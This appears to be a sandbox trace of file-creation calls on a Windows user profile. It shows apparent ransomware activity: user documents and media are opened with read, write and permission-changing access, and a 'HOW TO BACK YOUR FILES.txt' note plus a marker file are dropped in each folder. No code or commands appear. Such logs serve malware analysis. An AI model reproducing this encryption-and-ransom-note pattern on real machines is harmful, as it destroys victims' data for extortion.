Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\jJADNxp7L0AwE.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\UhpMWGFi.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\x _R5.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\y6ubXI-WBD.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\3-C44ag206r7-7a-u.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\3htk4ngR.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\5j3J4t3qofV.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\5tCVQ4PvbMxeLAZpu1.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\7C4Q.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\85suf.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\9Nd9jssXw99ThRBTNM7P.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\aGhyAFRoo.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\aY_fyEf.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\Dbdfuzst6PZ_.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\dfisfgfVOG.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\DzblCW7scjQqRQVoIM.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\h bd3clz1Q5tEHTT.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\h t9MdzqmL.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\hzeE96S9vKSRPUEY6BcL.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\IeLgYQ3Ib.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\LbV09sOi9q6l_9e3.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\n9ZFDGmU0-yzqmqP0W.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\p9t T04.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\pLl2qR-HR2p6.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\rxUkDp.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\S7sxtg.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\sKoLK4y.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\tLMtnmm.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\TMtiGZYo.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\TTdnqfy.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\uKeH6EOh0T.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ut _Q2wK.csv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\VrmBeAnjedws.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\Wa4HKe.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\zH1qLFL_L5_F0_C1KIZ.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\_IWaP7-XwLltWjdEE.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\4GlM138d-HV-Uq.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\4vxTT7ZgV5J.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\A6pxU.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\DnM675.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\ItS9YL1.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\IwTT.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\q5 t9C04vQ_Z8QALJL.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\UeZ-KD32H74.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\x2mPfTMZrBzEwZuAHfp.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\yeOiJ.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\ywdty.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\zqzX.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\cFnKWi\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Contacts\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\294sz.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\2kOsnDQ8sk4iEc.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\66w2QG9-.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\aHx3nVhQd.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\aQTiHV46oGtw-kWYzdN.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\B1Y4Sf.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\CBpBim.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\DBhjSCY L-6dupKa.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\dM 1hRjzd1jrBH8W.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\DNvzavLWq s3Oc_A UaC.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\fADueh5_.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\g42UGBx1Dj.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Ir6VFeivjX.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Jub_eFN7HCcuHfTvv.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\JyRwaozx.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Lfhe6KRJPHl.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\LVOHH_6_OObqP.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\l_m6ACh-WGgkO-6.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\n yYkI2ney_gz_-zE.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\NrEu8Gyj.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\O3kltfMNYirubdno.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\OUtMYFGKvN.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\PUFiGN K2uY.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\p_O1lv1CEgWauiU.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\q-MlqL 1rLwdq98.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Qu9-HWI6tzX5Zu16Cpf.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Rx-7.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\SBQ20pb9Qa7gV5.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\tkUYMv-IQ SY5z7wi.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
